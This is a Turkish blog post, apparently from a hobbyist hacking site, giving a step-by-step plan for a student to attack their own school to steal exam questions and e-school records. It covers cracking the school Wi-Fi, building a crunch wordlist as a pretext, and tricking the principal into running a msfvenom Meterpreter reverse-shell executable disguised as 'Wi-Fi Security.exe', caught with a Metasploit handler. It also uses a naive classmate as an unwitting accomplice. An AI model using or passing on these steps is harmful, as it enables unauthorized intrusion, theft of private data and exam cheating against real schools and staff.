Header Ads

Okulumu Nasıl Hacklerim ? Saldırı Senaryomuz


Merhaba Arkadaşlar ;
Bugün sizlere " Okulumu nasıl hacklerim , Sınav soruları ve E-okul fotoğrafları gibi önemli bilgileri nasıl çalarım ? " sorularının cevabı olmaya çalışacağım.

Bizim için gerekli olan malzemeler ; 
 1. Bir adet Laptop ( Batarya %100 , Kali Linux 2016.2 Kurulu Olmalı )
 2. Bir Adet 8 GB USB ( İçinde Wifislax Olmalı )
 3. Bir Adet Saf Arkadaş ( Bütün işi bu saf yapacak )
 4. Bir Adet 1 GB USB ( İleride anlayacaksınız )
 5. Okula Ait bir Wi-Fi
 6. Telefon
 • Saldırı Senaryomuz 1. Aşama
Arkadaşlar öncelikle bilgisayarımıza 8 GB " Wifislax " olan USB takıyoruz ve sistemi boot ediyoruz .  Sonra " Goyscript " Yazılımını başlatıyoruz fakat bu yazılımdan 2-3 tane var sebebi ise ;
Farklı Wi-Fi güvenlikleri olduğu için 2-3 tane " Goyscript " adında yazılım bulunacak . Wi-Fi Firewall'a göre yazılımı seçiyoruz . Sonra Wi-Fi ağını kırıyoruz.


 • 2. Aşama
Şimdi biz bu Wi-Fi'yi kırdık . Bunu gidip müdüre Söyleceğiz. Fakat ondan önce bir kelime listesi oluşturacağız . Bu işin bahane kısmı . Şimdi İse ;

Okulumuzun Adı : CyberGuilty
Kuruluş Yılı : 2016

Şimdi USB Çıkarıp kali linux olarak boot ediyoruz .
Crunch yazılımı sayesinde yeni bir worldlist oluşturuyoruz. Bunun amacı müdüre şifreyi kırdığımızı söyleyip aynı zamanda bunu diğer usb içine atıp güvenli kelimeler bunlar şifreleri bunlardan oluşturabilirsiniz , diyeceğiz .

Crunch İle Worldlist Oluşturmak İçin ;

cruch 8 9 cybrglty2016 -o /root/Masaüstü/sifreler.txt

buradaki " cybrglty2016" okulun sessiz harfleri olacak .
 Şimdi şifre listemiz hazır .
 • 3.Aşama
Müdüre gitmeden bir adet virüs yazmamız gerekiyor . Bu virüsü yazacağız ve sonra ayarlarını yapacağız arkadaşımızı o sırada çaktırmadan çaldıracağız o ise virüsü başlatacak sonra oradan bir bahane bulup kaçacaksınız . Hemen bilgisayar başına koşup sistemdeki dosyaları çalacaksınız . 

Virüs Dosyasını Nasıl Yazacağım ?

Kali Linux ile terminali açıp sırası ile şu komutları takip edin ;
 1. service postgresql start
 2. msfvenom -p windows/meterpreter/reverse_tcp LHOST= İp Adresiniz LPORT=443 R > Wi-Fi Security.exe
 3. msfconsole
 4.  use multi/handler
 5. set Payload windows/meterpreter/revese_tcp
 6. set LHOST ip adresin
 7. set LPORT 443
 8. exploit

Son kodu siz arkadaşınızı çaldırdığınız an basacak veri akışı gerçekleşecek eğer müdür size şifreyi sen değiştir falan gibisinden konuşur ise bir bahane bulun ben işte uğraştım buldum gerisi sizde hocam falan filan sonra oradan bilgisayar başına koşun ve mümkünse 15-20 saniye içinde olsun . Zaman geçtikçe virüs devre dışı kalma ihtimali o kadar yüksek olur .
 • Şimdi Okulu Nasıl Hackledik ?
Okulu şuan şöyle hacklediniz , oluşturduğunuz virüs local ağda çalışan bir virüs ve önce Wi-Fi kırdınız ve local ağda oldunuz . Sonra virüsü hocaya yedirip istediğiniz dosyaları çaldınız . Sonra Wi-Fi şifresini değiştirdiler şimdi elinizdeki worldlist.txt ile bruteforce sayesinde tekrardan 5 dakika içinde Wi-Fi kırabileceksiniz . Hem dosyaları çalmış olacak hemde Wi-Fi sahibi olacaksınız ! 


CyberGuilty INC. Blogger tarafından desteklenmektedir.